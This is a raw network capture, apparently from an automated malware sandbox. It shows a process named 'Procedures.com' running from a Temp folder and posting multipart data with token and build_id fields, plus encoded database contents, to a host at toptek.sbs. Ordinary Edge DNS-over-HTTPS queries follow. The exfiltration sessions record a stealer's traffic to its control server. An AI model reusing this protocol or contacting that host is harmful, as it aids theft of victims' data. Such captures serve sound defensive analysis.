                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:09 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  15192.168.2.54983794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:08 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:08 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------1DTJW47QQ9RQQIMOZU3ECont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:09 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  16192.168.2.54990794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:28 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----P8QIECJ5XBIM7Y5XBAIE
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 3165
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:28 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------P8QIECJ5XBIM7Y5XBAIEContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------P8QIECJ5XBIM7Y5XBAIEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P8QIECJ5XBIM7Y5XBAIECont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  17192.168.2.549925172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5edb6438b-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ea 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  18192.168.2.549924172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5f8b98c48-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0d 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  19192.168.2.549932172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5f8944258-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  20192.168.2.549931172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
